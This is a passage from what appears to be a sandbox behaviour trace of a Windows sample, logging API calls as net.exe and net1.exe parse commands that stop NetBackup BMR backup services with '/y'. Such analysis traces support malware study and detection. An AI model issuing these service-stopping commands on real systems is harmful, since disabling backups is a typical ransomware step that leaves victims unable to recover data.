(_String1="NET stop BMR", _String2="NET USE\r\n[de", _MaxCount=0xc) returned -2 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģొ") returned 0xf0 [0055.574] _wcsnicmp (_String1="NET stop BMR", _String2="NET USER\r\n[u", _MaxCount=0xc) returned -2 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ్") returned 0x47 [0055.574] _wcsnicmp (_String1="NET stop BMR", _String2="NET VIEW\r\n[\\", _MaxCount=0xc) returned -3 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ౐") returned 0xc2 [0055.574] _wcsnicmp (_String1="NET stop BMR", _String2="NET\r\n [ A", _MaxCount=0xc) returned 19 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ౓") returned 0x28d [0055.574] _wcsnicmp (_String1="NET stop BMR", _String2="SERVICES\r\nNE", _MaxCount=0xc) returned -5 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģౖ") returned 0x483 [0055.574] _wcsnicmp (_String1="NET stop BMR", _String2="SYNTAX\r\nThe ", _MaxCount=0xc) returned -5 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģౙ") returned 0xa86 [0055.574] _wcsnicmp (_String1="NET stop BMR", _String2="NAMES\r\nThe f", _MaxCount=0xc) returned 4 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ౜") returned 0x54 [0055.574] _wcsnicmp (_String1="NET stop BMR", _String2="\r\nFor more i", _MaxCount=0xc) returned 97 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ௼") returned 0xad [0055.574] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ௿") returned 0x2e [0055.574] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģం") returned 0x7d [0055.574] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0055.574] LocalFree (hMem=0x3290348) returned 0x0 [0055.574] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఅ") returned 0x26 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0055.575] LocalFree (hMem=0x3290348) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģఈ") returned 0x19 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0055.575] LocalFree (hMem=0x3284278) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఋ") returned 0x1b [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0055.575] LocalFree (hMem=0x3290348) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģఎ") returned 0xbe [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0055.575] LocalFree (hMem=0x3290348) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģ఑") returned 0x33 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0055.575] LocalFree (hMem=0x3290348) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģఔ") returned 0x19 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0055.575] LocalFree (hMem=0x3284278) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="͈̩ć蛬ģగ") returned 0xc1 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0055.575] LocalFree (hMem=0x3290348) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģచ") returned 0x16 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0055.575] LocalFree (hMem=0x3284278) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="ፐ̩ć蛬ģఝ") returned 0x33 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0055.575] LocalFree (hMem=0x3291350) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="ፐ̩ć蛬ģఠ") returned 0x234 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0055.575] LocalFree (hMem=0x3291350) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䙨̨ć蛬ģణ") returned 0x13 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0055.575] LocalFree (hMem=0x3284668) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģద") returned 0x14 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0055.575] LocalFree (hMem=0x3284278) returned 0x0 [0055.575] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģ఩") returned 0x14 [0055.575] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0055.575] LocalFree (hMem=0x3284278) returned 0x0 [0055.576] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="㞠̨ć蛬ģబ") returned 0x11 [0055.576] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0055.576] LocalFree (hMem=0x32837a0) returned 0x0 [0055.576] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģయ") returned 0x14 [0055.576] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0055.576] LocalFree (hMem=0x3284278) returned 0x0 [0055.576] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䙨̨ć蛬ģల") returned 0x12 [0055.576] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0055.576] LocalFree (hMem=0x3284668) returned 0x0 [0055.576] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="㞠̨ć蛬ģవ") returned 0xf [0055.576] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0055.576] LocalFree (hMem=0x32837a0) returned 0x0 [0055.576] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģస") returned 0x17 [0055.576] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0055.576] LocalFree (hMem=0x3288be0) returned 0x0 [0055.576] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="诠̨ć蛬ģ఻") returned 0x18 [0055.576] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0055.576] LocalFree (hMem=0x3288be0) returned 0x0 [0055.576] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="ፐ̩ć蛬ģా") returned 0x21 [0055.576] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0055.576] LocalFree (hMem=0x3291350) returned 0x0 [0055.576] FormatMessageW (in: dwFlags=0x1900, lpSource=0x11d0002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x107f0b4, nSize=0x0, Arguments=0x107f0b0 | out: lpBuffer="䉸̨ć蛬ģు") returned 0x15 [0055.576] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0055.576] GetFileType (hFile=0x90) returned 0x2 [0055.576] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x107f0b0 | out: lpMode=0x107f0b0) returned 1 [0055.576] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x3284278*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x107f0b4, lpReserved=0x0 | out: lpBuffer=0x3284278*, lpNumberOfCharsWritten=0x107f0b4*=0x15) returned 1 [0055.577] LocalFree (hMem=0x3284278) returned 0x0 [0055.577] NetApiBufferFree (Buffer=0x3287cf0) returned 0x0 [0055.577] NetApiBufferFree (Buffer=0x3287cc0) returned 0x0 [0055.577] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop BMR Boot Service /y" [0055.577] exit (_Code=1) Thread: id = 43 os_tid = 0x3a0 Process: id = "18" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5aed7000" os_pid = "0xeac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"net.exe\" stop NetBackup BMR MTFTP Service /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0xc04 Thread: id = 48 os_tid = 0x378 Process: id = "19" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x10a98000" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xeac" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0x608 Thread: id = 46 os_tid = 0x39c Thread: id = 47 os_tid = 0xd7c Process: id = "20" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0xdd94000" os_pid = "0x390" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xeac" cmd_line = "C:\\WINDOWS\\system32\\net1 stop NetBackup BMR MTFTP Service /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 49 os_tid = 0xb78 [0056.094] GetModuleHandleA (lpModuleName=0x0) returned 0x1220000 [0056.094] __set_app_type (_Type=0x1) [0056.094] __p__fmode () returned 0x76953c14 [0056.094] __p__commode () returned 0x769549ec [0056.094] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1226f20) returned 0x0 [0056.094] __getmainargs (in: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610, _DoWildCard=0, _StartInfo=0x123f61c | out: _Argc=0x123f608, _Argv=0x123f60c, _Env=0x123f610) returned 0 [0056.095] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0056.095] GetConsoleOutputCP () returned 0x1b5 [0056.095] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x1246fa0 | out: lpCPInfo=0x1246fa0) returned 1 [0056.096] SetThreadUILanguage (LangId=0x0) returned 0xbc0409 [0056.100] sprintf_s (in: _DstBuf=0x9ef99c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0056.100] setlocale (category=0, locale=".437") returned="English_United States.437" [0056.102] GetStdHandle (nStdHandle=0xfffffff5) returned 0x344 [0056.102] GetStdHandle (nStdHandle=0xfffffff4) returned 0x90 [0056.102] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop NetBackup BMR MTFTP Service /y" [0056.102] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9ef744, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0056.102] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x96) returned 0xc54688 [0056.102] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0056.102] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x9ef740 | out: Buffer=0x9ef740*=0xc57d70) returned 0x0 [0056.102] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x9ef73c | out: Buffer=0x9ef73c*=0xc57bc0) returned 0x0 [0056.102] __iob_func () returned 0x76952608 [0056.102] _fileno (_File=0x76952608) returned 0 [0056.102] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0056.103] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0056.103] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0056.103] _wcsicmp (_String1="config", _String2="stop") returned -16 [0056.103] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0056.103] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0056.103] _wcsicmp (_String1="file", _String2="stop") returned -13 [0056.103] _wcsicmp (_String1="files", _String2="stop") returned -13 [0056.103] _wcsicmp (_String1="group", _String2="stop") returned -12 [0056.103] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0056.103] _wcsicmp (_String1="help", _String2="stop") returned -11 [0056.103] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0056.103] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0056.103] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0056.103] _wcsicmp (_String1="session", _String2="stop") returned -15 [0056.103] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0056.103] _wcsicmp (_String1=0x1221ffc, _String2="stop") returned -15 [0056.103] _wcsicmp (_String1="share", _String2="stop") returned -12 [0056.103] _wcsicmp (_String1="start", _String2="stop") returned -14 [0056.103] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0056.103] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0056.103] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0056.103] _wcsicmp (_String1="accounts", _String2="NetBackup") returned -13 [0056.103] _wcsicmp (_String1="computer", _String2="NetBackup") returned -11 [0056.103] _wcsicmp (_String1="config", _String2="NetBackup") returned -11 [0056.103] _wcsicmp (_String1="continue", _String2="NetBackup") returned -11 [0056.103] _wcsicmp (_String1="cont", _String2="NetBackup") returned -11 [0056.103] _wcsicmp (_String1="file", _String2="NetBackup") returned -8 [0056.103] _wcsicmp (_String1="files", _String2="NetBackup") returned -8 [0056.103] _wcsicmp (_String1="group", _String2="NetBackup") returned -7 [0056.103] _wcsicmp (_String1="groups", _String2="NetBackup") returned -7 [0056.103] _wcsicmp (_String1="help", _String2="NetBackup") returned -6 [0056.103] _wcsicmp (_String1="helpmsg", _String2="NetBackup") returned -6 [0056.103] _wcsicmp (_String1="localgroup", _String2="NetBackup") returned -2 [0056.104] _wcsicmp (_String1="pause", _String2="NetBackup") returned 2 [0056.104] _wcsicmp (_String1="session", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="sessions", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="sess", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="share", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="start", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="stats", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="statistics", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="stop", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="time", _String2="NetBackup") returned 6 [0056.104] _wcsicmp (_String1="user", _String2="NetBackup") returned 7 [0056.104] _wcsicmp (_String1="users", _String2="NetBackup") returned 7 [0056.104] _wcsicmp (_String1="msg", _String2="NetBackup") returned -1 [0056.104] _wcsicmp (_String1="messenger", _String2="NetBackup") returned -1 [0056.104] _wcsicmp (_String1="receiver", _String2="NetBackup") returned 4 [0056.104] _wcsicmp (_String1="rcv", _String2="NetBackup") returned 4 [0056.104] _wcsicmp (_String1="netpopup", _String2="NetBackup") returned 14 [0056.104] _wcsicmp (_String1="redirector", _String2="NetBackup") returned 4 [0056.104] _wcsicmp (_String1="redir", _String2="NetBackup") returned 4 [0056.104] _wcsicmp (_String1="rdr", _String2="NetBackup") returned 4 [0056.104] _wcsicmp (_String1="workstation", _String2="NetBackup") returned 9 [0056.104] _wcsicmp (_String1="work", _String2="NetBackup") returned 9 [0056.104] _wcsicmp (_String1="wksta", _String2="NetBackup") returned 9 [0056.104] _wcsicmp (_String1="prdr", _String2="NetBackup") returned 2 [0056.104] _wcsicmp (_String1="devrdr", _String2="NetBackup") returned -10 [0056.104] _wcsicmp (_String1="lanmanworkstation", _String2="NetBackup") returned -2 [0056.104] _wcsicmp (_String1="server", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="svr", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="srv", _String2="NetBackup") returned 5 [0056.104] _wcsicmp (_String1="lanmanserver", _String2="NetBackup") returned -2 [0056.104] _wcsicmp (_String1="alerter", _String2="NetBackup") returned -13 [0056.104] _wcsicmp (_String1="netlogon", _String2="NetBackup") returned 10 [0056.104] _wcsicmp (_String1="accounts", _String2="BMR") returned -1 [0056.104] _wcsicmp (_String1="computer", _String2="BMR") returned 1 [0056.104] _wcsicmp (_String1="config", _String2="BMR") returned 1 [0056.105] _wcsicmp (_String1="continue", _String2="BMR") returned 1 [0056.105] _wcsicmp (_String1="cont", _String2="BMR") returned 1 [0056.105] _wcsicmp (_String1="file", _String2="BMR") returned 4 [0056.105] _wcsicmp (_String1="files", _String2="BMR") returned 4 [0056.105] _wcsicmp (_String1="group", _String2="BMR") returned 5 [0056.105] _wcsicmp (_String1="groups", _String2="BMR") returned 5 [0056.105] _wcsicmp (_String1="help", _String2="BMR") returned 6 [0056.105] _wcsicmp (_String1="helpmsg", _String2="BMR") returned 6 [0056.105] _wcsicmp (_String1="localgroup", _String2="BMR") returned 10 [0056.105] _wcsicmp (_String1="pause", _String2="BMR") returned 14 [0056.105] _wcsicmp (_String1="session", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="sessions", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="sess", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="share", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="start", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="stats", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="statistics", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="stop", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="time", _String2="BMR") returned 18 [0056.105] _wcsicmp (_String1="user", _String2="BMR") returned 19 [0056.105] _wcsicmp (_String1="users", _String2="BMR") returned 19 [0056.105] _wcsicmp (_String1="msg", _String2="BMR") returned 11 [0056.105] _wcsicmp (_String1="messenger", _String2="BMR") returned 11 [0056.105] _wcsicmp (_String1="receiver", _String2="BMR") returned 16 [0056.105] _wcsicmp (_String1="rcv", _String2="BMR") returned 16 [0056.105] _wcsicmp (_String1="netpopup", _String2="BMR") returned 12 [0056.105] _wcsicmp (_String1="redirector", _String2="BMR") returned 16 [0056.105] _wcsicmp (_String1="redir", _String2="BMR") returned 16 [0056.105] _wcsicmp (_String1="rdr", _String2="BMR") returned 16 [0056.105] _wcsicmp (_String1="workstation", _String2="BMR") returned 21 [0056.105] _wcsicmp (_String1="work", _String2="BMR") returned 21 [0056.105] _wcsicmp (_String1="wksta", _String2="BMR") returned 21 [0056.105] _wcsicmp (_String1="prdr", _String2="BMR") returned 14 [0056.105] _wcsicmp (_String1="devrdr", _String2="BMR") returned 2 [0056.105] _wcsicmp (_String1="lanmanworkstation", _String2="BMR") returned 10 [0056.105] _wcsicmp (_String1="server", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="svr", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="srv", _String2="BMR") returned 17 [0056.105] _wcsicmp (_String1="lanmanserver", _String2="BMR") returned 10 [0056.106] _wcsicmp (_String1="alerter", _String2="BMR") returned -1 [0056.106] _wcsicmp (_String1="netlogon", _String2="BMR") returned 12 [0056.106] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0056.106] SetThreadUILanguage (LangId=0x0) returned 0xbc0409 [0056.106] LoadLibraryExW (lpLibFileName="neth.dll", hFile=0x0, dwFlags=0x822) returned 0xc30002 [0056.107] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc5d, dwLanguageId=0x0, lpBuffer=0x9ef218, nSize=0x0, Arguments=0x9ef214 | out: lpBuffer="ŰÆ\x9e觘ģౝ") returned 0xff [0056.108] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x1eb | out: _String="CONTINUE: CONT", _Context=0x1eb) returned="CONTINUE: CONT" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nFILE: FILES" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nGROUP: GROUPS" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSESSION: SESSIONS, SESS" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSTATISTICS: STATS" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nUSER: USERS" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSERVER: SVR, SRV" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\n" [0056.108] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.108] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x1eb | out: 